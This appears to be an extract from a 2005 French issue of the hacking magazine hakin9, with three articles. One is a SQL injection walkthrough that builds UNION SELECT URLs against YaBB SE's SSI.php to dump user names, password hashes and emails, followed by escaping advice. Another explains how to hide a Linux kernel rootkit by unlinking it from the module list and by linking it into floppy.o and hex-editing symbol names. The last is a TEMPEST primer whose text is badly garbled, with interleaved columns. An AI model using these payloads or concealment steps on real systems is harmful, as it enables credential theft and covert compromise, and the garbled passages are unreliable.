en développement, mais les fichiers {$db _ prefi x}log _ mark _ read AS lmr
Listing 2. Requête SQL de SSI.php, ligne 222
$request = mysql_query(" SELECT m.posterTime, m.subject, m.ID_§
TOPIC, m.posterName, m.ID_MEMBER, IFNULL(mem.realName, m.posterName) §
AS posterDisplayName, t.numReplies, t.ID_BOARD, t.ID_FIRST_MSG, b.name §
AS bName, IFNULL(lt.logTime, 0) AS isRead, IFNULL(lmr.logTime, 0) §
AS isMarkedRead FROM {$db_prefix}messages AS m, {$db_prefix}topics §
AS t, {$db_prefix}boards as b LEFT JOIN {$db_prefix}members AS mem §
ON (mem.ID_MEMBER=m.ID_MEMBER) LEFT JOIN {$db_prefix}log_topics §
AS lt ON (lt.ID_TOPIC=t.ID_TOPIC AND lt.ID_MEMBER=$ID_MEMBER) §
LEFT JOIN {$db_prefix}log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD §
AND lmr.ID_MEMBER=$ID_MEMBER) WHERE m.ID_§
MSG IN (" . implode(',', $messages) . ") AND t.ID_TOPIC=m.ID_TOPIC §
AND b.ID_BOARD=t.ID_BOARD ORDER BY m.posterTime DESC;") §
or database_error(__FILE__, __LINE__);
www.hakin9.org hakin9 N o 3/2005

ON (lmr.ID _ BOARD =t.ID _ BOARD AND
lmr.ID _ MEMBER=$ID _ MEMBER).
Afin de transformer cette instruc-
tion en instruction SQL valide, nous
devons l'agrandir en trois étapes. Tout
d'abord, nous supprimons le guillemet
placé après le 1 puis nous le rempla-
çons par le caractère ). Ce qui permet
d'achever la ligne ID _ MEMBER=$ID _
MEMBER . Il suffira, ensuite, d'ajouter
la ligne trouvée dans l'instruction
originale puis de l'améliorer avec le
caractère de contrôle /*, ce afin d'em-
pêcher l'application de traiter le code
qui suivait. La nouvelle connexion est
la suivante : SSI.php?function=recent
Topics&ID_MEMBER=1) LEFT JOIN
yabbse_log _mark_read AS lmr ON
(lmr.ID_BOARD=t.ID_BOARD AND
lmr.ID_MEMBER=1) /*. La page
désormais affichée ne donne aucun
résultat de recherche.
Si nous utilisons les injections
SQL, il semblerait que notre requête
soit correcte. Mais où donc placer
notre requête UNION SELECT toujours
absente ? Nous pouvons tout sim-
plement améliorer cette instruction au
moyen de la chaîne appropriée UNION
SELECT. Par approprié nous n'enten-
dons pas seulement valide, mais éga-
lement référencé vers les informations
que nous souhaitons obtenir du sys-
tème. Si nous considérons la structure
des bases de données MySQL, nous
devrions trouver une table appelée
yabbse_members contenant – entre
autres – le nom de l'utilisateur, le
mot de passe haché avec la fonction
md5_hmac, l'adresse e-mail etc. En
supposant que nous disposions d'un
accès pour exécuter une requête SQL
de type SELECT qui consiste à sélec-
tionner les champs nommés, nous uti-
liserions une instruction de ce genre :
SELECT memberName, passwd, emailAd-
dress FROM yabbse _ members.
Nous améliorons donc notre ins-
truction d'injection grâce à l'expres-
sion SELECT puis nous ajoutons le mot
magique UNION. Ce procédé encou-
rage la base de données à associer
l'instruction originale SELECT à celle
que nous avons ajoutée nous-mêmes.
Le résultat obtenu est une combinai-
son de nos deux requêtes contenant
l'ensemble des rangées à partir des
hakin9 N o 3/2005
Attaques par injections SQL
Figure 3. Noms des utilisateurs et mots de passe hachés après l'attaque
UNION SELECT
deux sélections. Nous pouvons dé-
sormais appeler SSI.php?function=re
centTopics&ID_MEMBER= 1) LEFT
JOIN yabbse_log _mark_read AS lmr
ON (lmr.ID_BOARD=t.ID_BOARD
AND lmr.ID_MEMBER=1) UNION
SELECT ID_MEMBER, member-
Name FROM yabbse_members /*.
Malheureusement, cette déclaration
renvoie le message suivant : The
used SELECT statements have a
different number of columns (Les
instructions utilisées SELECT con-
tiennent un nombre différent de
colonnes). En effet, le nombre de co-
lonnes sélectionnées au moyen de la
requête UNION doit être identique pour
les deux tables.
Il nous faut donc passer le nom-
bre de colonnes sélectionnées de
la première instruction à 12 – notre
SELECT après UNION n'en comporte
que trois pour le moment. Afin
d'améliorer notre instruction, nous
devrions ajouter une option de type
null chargée de compter sans trans-
porter aucune donnée, bien entendu.
Ce qui nous conduit à la nouvelle
connexion suivante : SSI.php?functi
on=recentTopics&ID_MEMBER= 1)
LEFT JOIN yabbse_log _mark_read
AS lmr ON (lmr.ID_BOARD=t.ID_
BOARD AND lmr.ID_MEMBER=1
OR 1=1) UNION SELECT member-
Name, emailAddress, passwd, null,
null, null, null, null, null, null, null, null
FROM yabbse_members /*.
Nous pouvons déjà voir s'afficher
une adresse e-mail sur l'écran de
résultat, mais où se trouve le reste
des colonnes choisies ? Si nous
examinons le code source – notam-
ment celui de l'analyseur syntaxique
HTML qui permet de rendre visible
le résultat de la requête SQL sur le
site Web – nous aurons la possibilité
de voir où et comment le résultat de
www.hakin9.org
notre instruction SELECT est analysée
syntaxiquement. Après avoir modifié
les arguments de notre instruction
SELECT, nous pouvons appeler dé-
sormais SSI.php?function=recentTo
pics&ID_MEMBER=1) LEFT JOIN
yabbse_log _mark_read AS lmr
ON (lmr.ID_BOARD=t.ID_BOARD
AND lmr.ID_MEMBER=1 OR 1=1)
UNION SELECT null, member-
Name, null, emailAddress, null,
passwd,null,null,null,null,null,null
FROM yabbse_members /*.
Enfin, nous pouvons voir le nom
de l'utilisateur ainsi que le mot de
passe haché. L'adresse e-mail de-
meure cependant cachée sous le
lien du mot de passe haché (voir la
Figure 3). Nous avons tout de même
atteint notre objectif : nous avons
obligé l'application à traiter une ins-
truction SELECT vers les tables autres
que le script original.
C'est pas sorcier !
Comme nous l'avons déjà évoqué,
les injections SQL sont en réalité
une sorte d'attaque par validation
d'entrée. Ces attaques sont très
efficaces sur les applications qui
analysent l'ensemble des données
d'entrée de l'utilisateur de manière
directe sans aucun contrôle, ainsi
que sur les applications où l'ensem-
ble des caractères de contrôle (tels
que la barre oblique – slash ou la
barre oblique inverse – backslash)
sont interprétés. En tant que pro-
grammeur, vous devez vous assurer
que toutes les données d'entrée de
l'utilisateur soient validées puis dé-
sarmées. Il vous est possible dans
ce cas, d'ajouter tout simplement la
fonction addslash() à chaque donnée
d'entrée des utilisateurs avant de les
traiter. Si cette fonction est bien
ajoutée, l'ensemble des caractères
33
 ' (guillemet unique), " (guillemet
double), \ (barre oblique inverse)
et NULL sera annulé au moyen d'une
barre oblique inverse à la fin de cha-
que instruction, chargée d'indiquer
à l'interpréteur PHP de ne pas utiliser
ces caractères comme caractères
de contrôle, mais plutôt comme des
éléments normaux du texte.
Un administrateur pourrait égale-
ment avoir la possibilité de protéger
ses applications Web en modifiant le
fichier php.conf afin de protéger l'en-
semble des données d'entrée. Pour
ce faire, il est possible de modifier les
variables magic _ quotes _ gpc = On
pour toutes les requêtes GET/POST
ainsi que pour les données du cookie
et les variables magic _ quotes _ run-
time = On pour les données issues
de l'ensemble de SQL, exec() etc. La
majorité des distributions Linux font
déjà appel à ces valeurs par défaut
– uniquement dans le but d'obtenir
un niveau basique de sécurité sur
le serveur Web qu'elles contiennent.
Tous ces pièges peuvent être évités
sur des installations PHP dont la syn-
taxe est propre.
Mais que se passerait-il si nous
disposions d'autres instructions pou-
vant être insérées sans avoir recours
aux guillemets ? La plupart des
attaques par injections SQL serait
alors bloquée, mais qu'adviendrait-il
pour la partie suivante de la famille,
comme XSS (cross-site scripting) ?
Il subsiste encore des possibilités,
par exemple au moyen d'une inser-
tion de la balise HTML <iframe>. Grâ-
ce à cette technique, l'auteur d'une
attaque pourrait facilement insérer
sa propre page HTML sur votre site.
Il revient donc au programmeur de
sécuriser chaque donnée d'entrée
des utilisateurs modifiables contre
les autres attaques du type XSS.
Si un développeur souhaite disposer
Attaque
d'une classe parfaitement dévelop-
pée afin de purger les chaînes utili-
sateurs de caractères malveillants,
il est fort probable qu'il veuille faire
appel à Open Web Application Se-
curity Project du projet PHP Filters.
Vous pouvez consulter le site dont
l'adresse est indiquée dans l'Enca-
dré Sur le réseau.
34
Examinons maintenant les con-
séquences que peuvent avoir les
magic quotes (guillemets magiques)
avec un exemple : supposons que
quelqu'un entre la chaîne Jenny's
my beloved wife ! dans un champ
de formulaire. La commande SQL
sous-jacente est alors $query =
"INSERT INTO postings SET content
= '$input'"; Que se passe-t-il dans
l'ensemble de la chaîne de la requête
si un programmeur ou un administra-
teur y ajoute des barres obliques ?
La chaîne deviendrait alors $query =
"INSERT INTO postings SET content =
'Jenny\'s my beloved wife!'";. Ainsi,
le guillemet simple est dépourvu de
pertinence en ce qui concerne la
requête, car il ne fait plus partie de
la chaîne. Si quelqu'un désire affi-
cher la requête sur votre site Web,
il faudra qu'il utilise la fonction PHP
stripslashes() afin de supprimer de
la chaîne les barres obliques gênan-
tes pour rendre cette dernière de
nouveau lisible.
Mais, que se passe-t-il si le
programmeur et l'administrateur
ajoutent tous les deux des barres
obliques ? Y aura-t-il un ou deux
barres obliques ? Il y en aura en
réalité trois. Bien sûr, le premier est
inséré par PHP en raison de la con-
figuration, le second est inséré par
la fonction addslashes() – il n'existe
aucun moyen pour que cette fonction
reconnaisse les caractères neutrali-
sés. Le troisième est précisément
l'annulation ajoutée encore une fois
par la fonction addlashes() pour
annuler le caractère d'annulation
(escape) ajouté par PHP. Pourquoi
la fonction devrait-elle noter que le
guillemet simple est déjà supprimé ?
Le véritable défi serait de retrouver
maintenant notre chaîne originale
– il nous faut réduire le nombre de
barres obliques. Bien sûr, la fonc-
tion stripslashes() va échouer et la
seule façon de corriger le script con-
siste donc à contrôler la présence de
Sur le réseau :
• http://prodownloads.sourceforge.net/yabbse/ – référentiel du projet YaBB SE,
• http://www.owasp.org – Open Web Application Security Project.
www.hakin9.org
magic quotes dans le serveur en lan-
çant get _ magic _ quotes _ gpc().
Enfin, il faut également s'assurer
que la fonction magic _ quotes _ run-
time() n'est pas activée. À ce sujet,
le manuel d'utilisation PHP dit : Si
magic_quotes_runtime est activée,
la majorité des fonctions chargées de
retourner des données à partir d'une
quelconque source externe, parmi
lesquelles des bases de données
et des fichiers textes, contiendra des
guillemets annulés. Heureusement,
il est possible d'annuler cet effet
manuellement.
D'autres techniques
d'attaques
Il existe bien sûr d'autres techniques
d'Injections SQL également capables
de modifier des données existantes
en pénétrant les instructions SQL au
moyen des commandes SET, ou même
de supprimer des tables si le script
permet de poster des requêtes à plu-
sieurs lignes. Dans le cas du langage
PHP, ces techniques sont possibles
uniquement si la requête vulnérable
a déjà exécuté une commande SET
ou DROP TABLE, puisque les requêtes
traitées par mysql _ query() sont cen-
sées ne pas contenir le caractère ;
(qui ferme l'instruction pour le serveur
SQL). Il est impossible de terminer une
instruction et d'en débuter une autre si
les requêtes sont exécutées au moyen
de mysql _ query().
Vous pouvez voir à quel point ces
attaques sont dangereuses quand
elles utilisent les injections SQL et
combien il est difficile d'élaborer des
scripts fiables et sécurisés toujours
capables de délivrer les bonnes
données. La seule et unique règle
à respecter est la suivante : Ne faites
jamais confiance à vos utilisateurs
(vraiment, jamais !). Le programmeur
devra s'assurer de toujours contrôler
les données d'entrée de l'utilisateur
en cas de pièges dans les données
et ce afin de les désarmer. n
hakin9 N o 3/2005
 Méthodes de dissimulation
des modules du noyau
dans Linux
Mariusz Burdach
D
ans l'article publié dans le numéro
précédent (Rootkit personnel dans
GNU/Linux, hakin9 2/2005), nous
avons présenté le processus de création
d'un rootkit pour le système GNU/Linux avec
le noyau de la série 2.4. Le rootkit – vous le
trouverez sur le CD hakin9.live joint au maga-
zine – était chargé dans le noyau du système
d'exploitation à l'aide d'un module. Comme
nous l'avions dit, le module chargé (conte-
nant le code qui intercepte l'appel système
getdents()) n'était pas dissimulé. C'est pour-
quoi, il était facile à détecter – par exemple,
à l'aide de la commande cat /proc/modules
qui affi che tous les modules chargés actuel-
lement dans le système.
Dans cet article, nous allons nous occuper
des méthodes qui permettront de dissimuler
Attaque
un module quelconque dans le système. Vous
allez connaître deux techniques fondamen-
tales – la première consiste à déconnecter
le module de la liste des modules chargés,
et la seconde – à ajouter le module à un
autre module typique utilisé ordinairement
par le système d'exploitation (cette technique
permettant d'éveiller moins de soupçons, est
plus effi cace).
36 www.hakin9.org
L'insertion d'un rootkit en module
dans le noyau est le début de
la tâche de l'intrus. Pour rester
inaperçu, il faut trouver le moyen
de cacher ce code de façon à ne
pas éveiller des soupçons.
Déconnecter un module
de la liste
Pour déconnecter un module de la liste, nous
allons exploiter la technique qui consiste en
la modification directe des objets dans la
mémoire réservée pour le noyau du système
d'exploitation (en anglais direct kernel object
manipulation). Cette technique, contraire-
ment à celle décrite dans l'article précédent,
ne modifie pas le fonctionnement du système
d'exploitation – en effet, l'objet caché est plus
Cet article explique...
• comment cacher les modules du noyau de
Linux.
Ce qu'il faut savoir...
• comment fonctionne le noyau du système
Linux,
• créer des modules du noyau, même les plus
simples,
• connaître le langage C au moins au niveau de
base.
hakin9 N o 3/2005
 Dissimulation des modules du noyau dans Linux
Figure 1. La liste des modules interdépendants
difficile à détecter. Comme vous
vous rappelez, pour filtrer certai-
nes données (p. ex. le numéro du
processus ou le nom de fichier),
il faut intercepter une ou plusieurs
fonctions agissant dans l'espace du
noyau du système d'exploitation.
Dans cette méthode, aucune fonc-
tion ne sera interceptée, mais nous
allons modifier les objets représen-
tant les modules actifs.
Liste des objets
Dans la mémoire vive, tous les
objets représentant les modules
Figure 2. L'état du système avant et après la modification de la liste
hakin9 N o 3/2005
sont liés à travers une liste. L'objet
d'un module dernièrement chargé
pointe vers l'objet du module
chargé précédemment. Le corps
de la fonction init _ module() se
présente ainsi :
this_module.next = § •
this_module.next->next;
De plus, l'objet du module chargé
en premier pointe vers l'objet du
module dernièrement chargé.
Cette situation a été présentée sur
la Figure 1.
www.hakin9.org
C'est cette liste qui est lue par
la fonction système query _ module()
(appelée par le programme lsmod).
La structure de chaque objet repré-
sentant le module contient le champ
next qui pointe vers l'adresse de l'ob-
jet du module précédemment chargé.
Chaque objet (module) pointe vers le
module chargé précédemment en
constituant ainsi une liste des objets
interconnectés, ce qui est présenté
sur la Figure 1.
La méthode la plus simple pour
cacher un module consiste à dé-
connecter l'objet représentant un
module de la liste. Comme vous
pouvez deviner, il suffit de modifier
le champ next.
Le mode opératoire est le sui-
vant :
• nous chargeons le module X
(c'est le module que nous vou-
lons cacher),
nous chargeons le module Y qui
pointe vers le module X,
• nous modifions le champ next
de l'objet du module Y qui
pointe vers l'objet du module X
– le champ next doit contenir
l'adresse de l'objet qui précède
le module X (l'état avant et après
la modification est présenté sur la
Figure 2),
• nous supprimons le module Y de
la mémoire ; lors du processus
de suppression du module de la
mémoire, la fonction sys _ dele-
te _ module() modifiera la liste des
modules connectés. Pendant la
modification, la fonction utilisera le
champ next de l'objet du module Y.
Vu que le champ next a été mo-
difié (il pointe maintenant vers le
module suivant – Z), la liste sera
mise à jour de façon incorrecte (en
négligeant notre module X).
Attention : après une telle modifica-
tion de la liste, il sera impossible de
supprimer le module X de la mémoi-
re – pour cela, il faudra redémarrer le
système d'exploitation.
À ce moment, nous avons atteint
notre but. Le module fonctionne cor-
rectement et n'est pas présent sur la
liste des modules actifs.
37
 Listing 1. La structure de la section .symtab
typedef struct
{
Elf32_Word st_name; /*
Elf32_Addr st_value; /*
Elf32_Word st_size; /*
unsigned char st_info; /*
unsigned char st_other; /*
Elf32_Section st_shndx; /*
} Elf32_Sym;
Ajout des modules
Une autre technique permettant
de cacher efficacement le module
consiste à lier ce module à un autre
module chargé par défaut par le sys-
tème d'exploitation. Cela peut être,
par exemple, le module responsable
de la gestion de la carte réseau, du
système de fichiers ou du filtre de
paquets. Le plus grand avantage de
cette solution est qu'il ne faut pas se
soucier du démarrage du module
parce qu'il sera lancé automatique-
ment par le système d'exploitation.
Il est possible d'établir un lien car
le module est un fichier de type ELF
réallouable (en anglais Executable
and Linking Format – cf. l'article de
Marek Janiczek Ingénierie inverse
du code exécutable ELF dans l'ana-
lyse après intrusion, hakin9 1/2005).
Ce qui est important pour nous, c'est
que le fichier contient du code et des
données que nous pouvons lier à un
autre fichier de même type. En résul-
tat, nous pouvons obtenir un fichier
exécutable réallouable. Grâce à cet-
te propriété, nous sommes capables
de lier deux modules l'un à l'autre.
Attaque
Figure 3. La table des chaînes de caractères (.strtab) dans le champ au
format ELF
38
Symbol name (string tbl index) */
Symbol value */
Symbol size */
Symbol type and binding */
Symbol visibility */
Section index */
Mais il y a une condition impor-
tante : les symboles des objets liés
ne peuvent pas se répéter (si l'on lie
le module A au module B, les sym-
boles qui s'y trouvent ne doivent pas
avoir des noms identiques – il s'agit
avant tout des symboles : init _ mo-
dule et cleanup _ module).
Les deux modules sont liés
à l'aide de l'éditeur des liens ld qui
fait partie du paquet binutils. Ce pa-
quet est disponible par défaut dans
chaque distribution de Linux. Il faut
aussi utiliser l'option -r, pour obtenir
en résultat un objet réalloué – c'est-
à-dire, dans notre cas, le module
résultant que nous renommerons
ensuite avec le nom original. Par
exemple, si nous voulons infecter
le module floppy.o, la procédure se
présentera comme suit :
# ld -r floppy.o rootkit.o \
-o new.o
# mv new.o floppy.o
La meilleure idée est de choisir le
module qui est chargé lors du dé-
marrage du système d'exploitation
www.hakin9.org
Listing 2. La structure du
module modifié que nous avons
l'intention de lier au module
original
init_modula()
{
...
init_modulx();
}
cleanup_modula()
{
...
cleanup_modulx();
}
– pour obtenir la liste de tous les
modules chargés, il faut exécuter la
commande lsmod. Dans Linux, les
fichiers de modules se trouvent dans
le sous-répertoire /lib/modules/.
Pourtant, comme nous l'avions
déjà dit, avant d'effectuer les liens,
il faut modifier l'un des modules de
façon à ce que les noms des symbo-
les ne se répètent pas.
Modification du module
Chaque module qui sera chargé
par le système d'exploitation doit
posséder au moins deux symboles :
init _ module et cleanup _ module.
Ces symboles sont utilisés pendant
le processus du chargement et de
la suppression du module dans
et de la mémoire. Lors du charge-
ment d'un module dans la mémoire
à l'aide de l'outil insmod, la fonction
obj _ fi nd _ symbol localise l'adresse
de la fonction init _ module, pour
que cette adresse, dans la dernière
étape de l'initialisation, soit exploitée
par la fonction init() pour l'appeler
(init _ module).
Nous savons que lors de l'initiali-
sation du module, la fonction init _
module est appelée. De cela, l'unique
chose à faire après l'établissement
des liens, est la modification du mo-
dule de façon à appeler la fonction
d'initialisation du module ajouté,
et pas du module original auquel
nous ajoutons notre code. Pour
que le code du module original soit
aussi démarré, nous devons appe-
ler dans notre module la fonction
hakin9 N o 3/2005
 Dissimulation des modules du noyau dans Linux
d'initialisation du module original.
N'oubliez pas non plus que dans ces
deux modules, les symboles ne doi-
vent pas être identiques.
Étant donné que nous n'avons
pas toujours accès au code source
du module original, il est néces-
saire que notre module soit modifié
de façon appropriée (cf. l'article
Rootkit personnel dans GNU/Linux,
hakin9 2/2005).
Pendant la modification, il ne
faut pas oublier une autre limitation
relative à la longueur des noms des
fonctions. Tous les symboles pour
les objets ELF se trouvent dans
la table des symboles .symtab. La
structure de la section est présentée
dans le Listing 1 (vous la trouverez
aussi dans le fichier d'en-tête /usr/
include/elf.h).
Le contenu de la section .symtab
d'un module donné peut être affiché
à l'aide de la commande :
$ readelf -s <nom_du_module>.o
Le champ st _ name est un poin-
teur à la table contenant les noms
de tous les symboles. Cette table
(.strtab) comprend les chaînes de
caractères terminées par le carac-
tère null. L'exemple est présenté sur
la Figure 3.
Modification des noms
des fonctions
Pour appeler une fonction ap-
propriée lors de l'initialisation du
module, il faut modifier le contenu
de cette table. La méthode la plus
simple consiste à modifier les noms
de certains symboles dans le fichier
de résultat lié – il faudra changer le
nom de la fonction init _ module en,
par exemple, init _ modulx. Pourtant,
n'oubliez pas qu'avant la modifi -
cation, init _ module pointe vers la
fonction du module original.
Avant la compilation de notre
module, nous devons choisir le nom
de la fonction d'initialisation. Nous
savons que cela ne peut pas être
init _ module. De plus, le nom de la
fonction doit être constitué du mê-
me nombre (ou inférieur) de carac-
tères qu'i nit _ module, par exemple
hakin9 N o 3/2005
11 caractères. Dans notre cas, que
ce nom soit init _ modula. Après le
linkage, nous devons encore chan-
ger ce nom en init _ module – ainsi,
pendant le chargement du module
dans la mémoire, la fonction init()
appellera la fonction d'initialisation
à partir du module ajouté.
Pour laisser les fonctions du
module original, nous devons
à partir de notre module, appeler
la fonction originale init _ module
(nommée déjà init _ modulx). Cela
signifie qu'avant la compilation de
notre module, nous devons connaî-
tre déjà le nom futur de la fonction
originale init _ module (ici, nous
l'avons appelée init _ modulx).
Nous devons effectuer la même
opération pour la fonction clea-
nup _ module. Nous admettons que
la fonction originale cleanup _ module
portera le nom cleanup _ modulx. De
plus, dans le code de notre module,
nous changerons le nom de clea-
nup _ module en cleanup _ modula,
et le corps de la fonction contiendra
le renvoi à la fonction originale clea-
nup _ module (alors, après modifica-
tion, cleanup _ modulx).
Le structure de notre module
à compiler devra être similaire à celle
du Listing 2.
Le code source entier (prêt à être
lié) est disponible sur le CD joint au
magazine. Après la compilation du
module et le linkage, nous obtenons
le module résultant qui doit avoir le
même nom que le module original
(par exemple floppy.o).
Modification de la table .strtab
La dernière opération à faire est la
modification de la table contenant
les chaînes de caractères (.strtab).
Comme nous pouvons supposer, la
modification du module résultant con-
siste à modifier quelques lettres dans
l'endroit approprié. La méthode plus
élégante consistera à construire de
nouveau les tables .strtab et .symtab.
Quant à nous, nous nous concentre-
rons sur la modification manuelle.
Les modifications dans le tableau
se ramènent à la modification des
noms suivants (dans l'ordre donné
ci-dessous) :
www.hakin9.org
• init _ moduleen init _ modulx,
• init _ modulaen init _ module,
• cleanup _ module en cleanup _ mo-
dulx,
• cleanup _ modula en cleanup _ mo-
dule.
Pour modifier la table .strtab, nous
pouvons exploiter un éditeur hexa-
décimal quelconque, par exemple
hexedit. Pour obtenir le décalage
dans le module binaire à partir du-
quel la table commence, nous pou-
vons utiliser la commande readelf
-S floppy.o, comme cela est présenté
au-dessous :
$ readelf -S floppy.o \
| grep .strtab
[21] .strtab STRTAB §
00000000 0119e0 001279 00 0 0 1
Maintenant, nous n'avons qu'à
charger le module de l'éditeur bi-
naire et à modifier les symboles
appropriés.
Maintenant, nous pouvons
charger le module fl oppy.o infecté
et le placer dans le sous-réper-
toire approprié dans le répertoire
/lib/modules (/lib/modules /kernel/
drivers/block/ ).
Beauté de la simplicité
Les méthodes de dissimulation des
modules présentées dans cet article
sont très simples à comprendre,
et ce qui est le plus important – effi-
caces. Grâce à elles, la dissimulation
du code malicieux (sous forme d'un
module) dans un système Linux est
simplissime.
Mais ce ne sont pas toutes les
difficultés auxquelles l'auteur des
rootkits doit faire face. Il peut arriver
que la fonction de chargement des
modules soit désactivée dans le
système. Notre rootkit basé sur le
module sera donc inutile, et il faudra
utiliser d'autres techniques. Heu-
reusement, il existe des méthodes
permettant d'éviter tous ces incon-
vénients, mais c'est un sujet pour un
autre article. n
39
 TEMPEST – émissions
compromettantes
Robin Lobel

TEMPEST, aussi connu sous

le nom de Van Eck Phreaking,
est l'art de transformer des
émissions involontaires en
données compromettantes.
Cela concerne principalement
les ondes électromagnétiques,
mais le principe peut être aussi
bien appliqué à n'importe quel
type d'émanations involontaires
induites par le fonctionnement
interne d'un périphérique. Le
plus commun des phénomènes
TEMPEST est relatif aux
moniteurs CRT.

L
es premières études concernant le
phénomène de compromission des on- Cet article explique...
des électromagnétiques remontent aux
• vous aurez assez de connaissance pour com-
années 1950. C’est en espionnant les trans-
mencer à construire votre propre système TEM-
missions de messages russes encryptés que
PEST.
la NSA s’aperçut de faibles cliquetis parasites
dans la tonalité porteuse, qu’émanaient des
Ce qu'il faut savoir...
électro-aimants de la machine d’encodage. En
construisant le dispositif approprié, il fut possi- • vous devez avoir quelques notions de montage
ble de reconstruire le texte en clair sans avoir électronique,
à décrypter les transmissions. Ce phénomène • vous devez connaître les bases de l'électroma-
pris successivement les noms de NAG1A, puis gnétisme.
FS222 dans les années 60, NACSIM5100 dans
les années 70, et finalement TEMPEST (acro-
nyme pour Transient Electromagnetic Pulse
Emanation Standard, bien que cette version À propos de l'auteur
Robin Lobel a mené plusieurs projet de re-
soit également controversée) à partir de 1980.
cherche informatique depuis quelques années,
En 1985 un scientifique Hollandais, Wim
Attaque

entre autre compression audio, analyse d'ima-

van Eck, publia un rapport sur les expérien-
ces qu’il menait depuis janvier 1983 dans
ce domaine. Il montre qu’un tel système est
réalisable avec peu de moyen, cependant il
ne donne que très peu de données concer-
nant les expériences elles-mêmes. En 1986
et 1988 des rapports complémentaires furent
publiés, suite à l’article de van Eck, mais sans
apporter d’autres informations concernant les
ges temps réel, moteur 3d temps réel, etc.
Il a étudié de manière approfondie le système
TEMPEST en 2003 et eu la chance de dispo-
ser d'un laboratoire complet pour mener à bien
ses expériences. Il aime aussi composer de la
musique et faire du graphisme 2D/3D. Étudie
actuellement le cinéma à Paris. Son site web :
http://www.divideconcept.net.

40 www.hakin9.org hakin9 N o 3/2005

 Émissions compromettantes

Figure 2. Une grille de pixels forme une image – la finesse de l'image

dépend de la densité de pixels

fantôme, comme la chaleur, l'odeur de aux mêmes règles et n'offre pas les
cuisine et même votre propre ombre. mêmes possibilités. Contrairement
Figure 1. Rouge, vert et bleu
De telles informations sont indispen- aux émissions électromagnétiques,
se mélangent pour synthétiser
sables aux détectives car elles sont les lumières dans un système infor-
n'importe quelle couleur
leur seul base pour reconstituer ce qui matique ont des rôles spécifi ques,
expériences. En 1998 John Young, s'est réellement passé. Physiquement et sont volontairement placées
un citoyen américain, demande parlant, il y a trois genres de fantômes pour informer de l'état du système.
à la NSA de publier des informa- qui peuvent nous aider à reconstruire Si vous observez les LEDs de plus
tions déclassifiées concernant le les données dans le domaine infor- près, elles répondent également
système TEMPEST. Voyant sa re- matique : électromagnétique, optique aux potentiels électriques, donc la
quête rejetée, il fait appel et obtient et acoustique. moindre fluctuation dans le sys-
finalement en 1999 quelques docu- tème a un effet sur les LEDs et
ments, mais largement censurés. Émission électromagnétique peut être perçue par des capteurs
Très peu d’informations sont dis- La trace la plus discrète et informa- optiques. Cela ne peut cependant
ponible sur ce système. La plupart tive. Partant du principe que tous les être utile que pour des événements
des documents ne font qu’exposer ordinateurs utilisent l'électricité et particuliers dans des conditions
superficiellement le phénomène, qu'un potentiel électrique induit un spéciales. De plus, l'information
sans rentrer dans les détails d’une champ électromagnétique propor- acquise n'est pas forcément inté-
expérience pratique. tionnel au potentiel, nous pouvons ressante.
déduire l'activité électrique interne.
Mais de quoi s'agit-il ? Ceci peut être appliqué aux périphé- Information acoustique
Le principe de TEMPEST et ses dé- riques d'affichage CRT et n'importe À peu près les mêmes possibilités
rivés est de reconstruire les données quel câble ou fil non protégé. qu'avec les émissions optiques.
originales à partir des informations Même moins, car la majorité d'un
fantômes. Un fantôme est une trace Fantômes optiques système informatique est silencieux,
laissée par un objet dans son environ- Bien qu'étant une onde électro- seules les parties mécaniques sont
nement. Une empreinte de pas est un magnétique, la lumière n'obéit pas sujettes à des productions acousti-
ques. Il y a très peu d'applications
pour ce genre d'émission. Un enre-
Sur le réseau : gistreur de clé matériel basé sur les
événements acoustiques pourrait
• http://upe.acm.jhu.edu/websites/Jon_Grover/page2.htm – des bases sur le van
être un bon exemple.
Eck phreaking,
• http://www.eskimo.com/~joelm/tempest.html – la page d'information complète
mais non officielle de TEMPEST, Une étude en
• http://www.noradcorp.com/2tutor.htm – page de la compagnie NoRad CRT Moni- particulier : les
tors as a Source of Electromagnetic Waves,
• http://xtronics.com/kits/rcode.htm – code de couleur des résistances,
émissions des
• http://web.telia.com/~u85920178/begin/opamp00.htm – l’explication sur les am- moniteurs CRT
plificateurs opérationnels, Une des émissions les plus inté-
• http://www.hut.fi /Misc/Electronics/circuits/vga2tv/vga2palntsc.html – le dispositif ressantes vient du périphérique
de conversion des signaux de synchronisation de Tomi Engdahl. d'affi chage, car son activité interne
est clairement en rapport avec des

hakin9 N o 3/2005 www.hakin9.org 41


Figure 3. Un faisceau d'électrons
produit l'image sur l'écran
informations importantes. De plus,
ce périphérique émet de fortes
ondes électromagnétiques qui sont
relativement aisées à capturer et
à traiter.
Le fonctionnement
des moniteurs
Toutes les couleurs peuvent être
décomposées en trois couleurs
fondamentales : rouge, vert et bleu
(voir Figure 1). Il est possible
– à travers la combinaison de ces
trois couleurs – de recréer n'im-
porte quelle couleur, en variant
ces proportions fondamentales.
Une image est considérée comme
un assemblage complexe de cou-
leurs, sous la forme d’une grille de
pixels (voir Figure 2). Un pixel est
un point composé des 3 couleurs
(rouge, vert, bleu). Il est possible
de recréer des images précises en
augmentant la densité de pixels. La
résolution d'une image est repré-
sentée par x*y, avec x le nombre de
pixels horizontaux, et y le nombre
de pixels verticaux (exemples :
640*480, 800*600, 1024*768 etc.)
Un écran est composé de plu-
sieurs modules. D'abord un tube
cathodique qui sert à la restitution
Attaque
Figure 5. Écran d'exemple, son codage électrique correspondant et son induction électromagnétique
42
directe de l’image. Un faisceau
d’électrons balaye une couche fluo-
rescente à très grande vitesse pour
afficher l’image. Le balayage se fait
de gauche à droite et de haut en bas,
à une fréquence de 50 Hz à 100 Hz
sur la totalité de l’écran.
La couche fl uorescente est
excitée au passage de ces élec-
trons et émet de la lumière. Cette
couche est également phosphores-
cente, c'est-à-dire qu’elle continue
à émettre de la lumière pendant
un bref instant (de 10 à 20 ms)
après son excitation. La lumino-
sité est déterminée par le débit
d’électrons, régulé par un wehl-
net (composant électronique). Le
faisceau passe ensuite entre 2
bobines (une pour déterminer la Figure 4. Une différence
déviation verticale, l'autre pour la de potentiel dans un câble
déviation horizontale, en utilisant conducteur produit une onde
les forces électromagnétiques) électromagnétique
pour diriger sa trajectoire, afin
de réaliser le balayage de l’écran de synchronisation verticaux, et
et reconstruire une image complète 600*70=42000 fois par seconde
(voir Figure 3). pour les signaux de synchronisation
Le signal vidéo passe par plu- horizontaux.
sieurs canaux (6 canaux pour le Les signaux vidéos sont des
signal vidéo lui-même). C'est-à-dire tensions de 0 V à 0.7 V, qui défi -
les canaux rouge, vert, bleu et leurs nissent l’intensité du point lumineux
